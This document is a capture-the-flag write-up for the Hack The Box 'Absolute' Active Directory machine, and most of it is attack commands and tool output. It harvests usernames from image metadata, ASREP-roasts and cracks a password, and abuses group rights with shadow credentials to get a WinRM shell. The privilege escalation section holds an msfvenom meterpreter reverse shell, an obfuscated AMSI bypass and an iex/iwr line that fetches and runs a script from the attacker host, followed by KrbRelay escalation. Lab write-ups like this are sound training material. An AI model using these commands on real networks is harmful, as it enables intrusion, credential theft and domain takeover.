HTB - Absolute
Description
Absolute is an Insane Windows Active Directory machine that starts with a webpage displaying some images, whose metadata is used to create a wordlist of possible usernames that may exist on the machine. It turns out that one of these users doesn't require Pre-authentication, therefore posing a valuable target for an ASREP roast attack. The discovered credentials are then used to enumerate LDAP and discover credentials for the user svc_smb, who has access to an SMB share containing a Windows binary. Performing dynamic analysis on the binary reveals that it tries to perform an LDAP connection to the Domain Controller with clear text credentials for the m.lovegod user, who owns the Network Audit group, which in turn has Generic Write over the winrm_user. Following this attack path and performing a shadow credential attack on the winrm_user, one can then WinRM and access the machine. Finally, the KrbRelay tool is used to add the winrm_user user to the Administrators group, leading to fully elevated privileges.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-01 18:41:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-time:
| date: 2024-11-01T18:42:29
|_ start_date: N/ASummary
* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - LDAP - LDAPS - winRM - SMB
* Important notes: DNS:dc.absolute.htb - Domain: absolute.htb - IIS httpd 10.0hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $sudo sh -c "echo '$ip dc dc.absolute.htb absolute.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $tail -n 1 /etc/hosts
10.10.11.181 dc dc.absolute.htb absolute.htbService Enumeration
I will start this box differently by enumerating the HTTP service first.
HTTP Enumeration
I didn't find anything in the webapp, So I tried to fuzz it but nothing interesting here only few common directories.
There are several images here, you can switch between them using the arrows.
If I look at the page code I will see their locations and names.
When I visit the images directory at http://absolute.htb/images/, I get Access denied.
I will switch now to my terminal to download each image
for i in {1..6};do wget -q http://absolute.htb/images/hero_$i.jpg;done
Looking at the image metadata, I see author and arrtist field containing names
I can use these names to create a wordlist and check for valid domain accounts
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $for image in $(ls); do exiftool $image | grep -i "Artist\|Author" | cut -d: -f2 | sort -u | tee -a users.txt;done
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole SmithThen, I will mutate these names to create possible combinations of them
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $/opt/tools/username-anarchy/username-anarchy -i users.txt > users.lstBruting kerberos to find valid users
kerbrute userenum -d absolute --dc dc.absolute.htb wordlists/users.lst -o wordlists/valid_users.lst
j.roberts
m.chaffrey
s.osvald
d.klay
j.robinson
n.smithFoothold
With this wordlist, I can move to attempt ASREPRoasting an attack
nxc ldap dc -u valid_domain_users.lst -p '' -d absolute.htb --asreproast asrep.hashes
The hash is cracked successfully :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $hashcat -m 18200 hashes/asrep.hashes /usr/share/wordlists/rockyou.txt
..snip..
$krb5asrep$23$d.klay@ABSOLUTE.HTB:19d6d35c374ae22b5c9f38860c1eddf5$ba7a42c258f10291c22324fc98d8618deaf7e325d2a47ceea3ad7367cef4391c8f6c4cfb40b7e82785064bf952da2929213555bbe13b7d2edb0c4dc7da0b5496d8115c53535866328272d61f004106a834f03e176701302e51accb139155d1b7ba5311b82407d515a2cbd3e713176cdfde686d2fd6bf9e37e13f16d629dd607965638f16fe9795bf756449e36cecf3ed2b557c169bcee012d77bd904631e665a3f89f2737650fa4b6279fc9956c48ab55b20feff7531e2a66896b939fc6d4c25ded4c217a64f10d3cc97c1551a7b33b7bdabeb23e978e09c39ca101d180636a126d6419cea3a8661e32b117a:Darkmoonsky248girl
Session..........: hashcat
Status...........: CrackedNow, I will make a To-do list to not forget anything in Enumeration phase
Check SMB shares access
Collect domain info with
bloodhound.pyCollect LDAP data with
ldapdomaindumpCheck for
winRMaccess usingbloodhoundqueryCheck for ADCS existence
Check for common CVE
GoldenPac,PetitpotamCheck for LDAP signing for possible NTLM relay attack
Check for password reuse
nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -M spider_plusThis error message means NTLM authentication is disabled, So I need to use kerberos authentication instead.
I don't have permission the interesting share folder so that I will move forward.
I can't use ldapdomaindump since the NTLM authentication is disabled but bloodhound.py is smart enough to switch to Kerberos authentication automatically
─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $bloodhound-python -u 'd.klay' -p 'Darkmoonsky248girl' -ns 10.10.11.181 -d absolute.htb -c all
INFO: Found AD domain: absolute.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Done in 420M 45SPKI exists on the domain
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M adcs -k
LDAP dc 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
ADCS dc 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS dc 389 DC Found PKI Enrollment Server: dc.absolute.htb
ADCS dc 389 DC Found CN: absolute-DC-CAThe target is not vulnerable to noPac but it's for petitpotam. I will note it down maybe I need it later.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M nopac
SMB dc 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
NOPAC dc 445 DC TGT with PAC size 1556
NOPAC dc 445 DC TGT without PAC size 1556
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M petitpotam
SMB dc 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
PETITPOTAM dc 445 DC VULNERABLE
PETITPOTAM dc 445 DC Next step: https://github.com/topotam/PetitPotam
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M ldap-checker -k
LDAP dc 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
LDAP-CHE... dc 389 DC LDAP Signing NOT Enforced!
LDAP-CHE... dc 389 DC LDAPS Channel Binding is set to "NEVER"I don't have winRM access to the box, either.
I want to get all the users in the domain, So I will use NetExec to get and luckily I go a user's credentials from the description field
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'svc_smb' -p 'AbsoluteSMBService123!' -k
LDAP dc 389 DC [+] absolute.htb\svc_smb:AbsoluteSMBService123! With the two passwords I have, I will try password spraying against the users I just found
AbsoluteSMBService123!
Darkmoonsky248girlUnfortunately, I didn't get any additional account
Checking the shares with the new user credential reveals that I have READ access on Shared folder
There are only 2 files in the share folder: compile.sh and test.exe
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/dc.json
{
"NETLOGON": {},
"SYSVOL": {},
"Shared": {
"compiler.sh": {
"atime_epoch": "2022-06-09 04:30:03",
"ctime_epoch": "2022-06-08 09:20:32",
"mtime_epoch": "2022-09-01 13:02:23",
"size": "72 B"
},
"test.exe": {
"atime_epoch": "2022-06-09 04:30:03",
"ctime_epoch": "2022-06-08 00:13:07",
"mtime_epoch": "2022-09-01 13:02:23",
"size": "66 KB"
}
}
}Connect to the shared folder and download the files after getting Kerberos ticket for easy access
kinit svc_smb
impacket-smbclient 'absolute.htb/svc_smb:AbsoluteSMBService123!@dc.absolute.htb' -k -no-pass
Lateral Movement
I will switch now to Windows VM to run this program or decompile it with dnSpy
When I run the file and Wireshark captures the network traffic, several DNS traffic comes into play
It tries to resolve _ldap._tcp.dc.absolute.htb
I will try the machine's IP 10.10.11.182 and run the program again
Make sure you connected with HTB Network with
.ovpnfile. I was usingOpenVPN GUIclient
It performs ldap binding
Here is the credentials it sends over the network mlovegod:AbsoluteLDAP2022!
There isn't a user with mlovegod name but there is m.lovegod
He Owns the Network Audit groups
Svc_audit user is a member of network audit and has GenericWrite over winrm_user
Only this user winrm_user can access the machine via winRM
So the attack path is:
Abuse Ownership of
Network Auditgroups to Give meGenericAllrightsAdd me to this Group and gain its privileges
Abuse
GenericWriteto add shadow credentials or change the password ofwinrm_userAccess the machine using
winrm_user
./bloodyAD -u m.lovegod -p 'AbsoluteLDAP2022!' -d absolute.htb --dc-ip 10.10.11.181 -k --host dc.absolute.htb add genericAll "CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB" m.lovegod
python3 powerview.py absolute.htb/m.lovegod:'AbsoluteLDAP2022!'@dc.absolute.htb -k
Add-DomainGroupMember -Identity "Network audit" -Members m.lovegod
kinit m.lovegod
KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
Or
python3 pywhisker.py -d absolute.htb -u m.lovegod -p 'AbsoluteLDAP2022!' --target winrm_user --action add -k
python3 gettgtpkinit.py -cert-pfx file.pfx -pfx-pass <pass> absolute.htb/winrm_user winrm.ccache
KRB5CCNAME=winrm.ccache python3 getnthash.py -key <aes256_key> absolute.htb/winrm_user┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
..snip..
[*] Adding Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $KRB5CCNAME=`pwd`/winrm_user.ccache evil-winrm -i dc -r absolute.htb
*Evil-WinRM* PS C:\Users\winrm_user\Documents> type ..\Desktop\user.txt
18dcdc1a7cf18d75167fbebf08f483b5User Flag: 18dcdc1a7cf18d75167fbebf08f483b5
Privilege Escalation
After getting access to the machine, I want to upgrade my shell to a persistent one. I will use meterpreter because I'm comfortable with it.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.12 lport=9001 -f psh -o shell.ps1
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
iex(iwr -UseBasicParsing 10.10.16.12/shell.ps1)┌─[kali@parrot]─[~/tools]
└──╼ $ sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.12;set lport 9001;set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Started reverse TCP handler on 0.0.0.0:9001
[*] Sending stage (200774 bytes) to 10.10.11.181
[*] Meterpreter session 1 opened (10.10.16.12:9001 -> 10.10.11.181:58987) at 2024-11-02 02:08:21 -0400
(Meterpreter 1)(C:\Windows\system32) > Since I found that ldap signing is disabled at the beginning, I can perform relaying against it with my access to the machine.
I will use this repo:
Following the repo, I can use several options here
CLSID of Windows 2019
First, we need to get the port number that allows SYSTEM
.\CheckPort.exe
..snip..
[*] SYSTEM Is allowed through port 10I need to run the exploit in different logon types: 2 or 9
.\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 'KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10'
.\RunasCs.exe d.klay Darkmoonsky248girl -l 9 ".\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 8F5DF053-3013-4dd8-B5F4-88214E81C0CF -add-groupmember administrators winrm_user"
PS C:\Users\Administrator\Desktop> type root.txtRoot Flag: adce565cxxxxxxxxxxxxxxxxxx
Last updated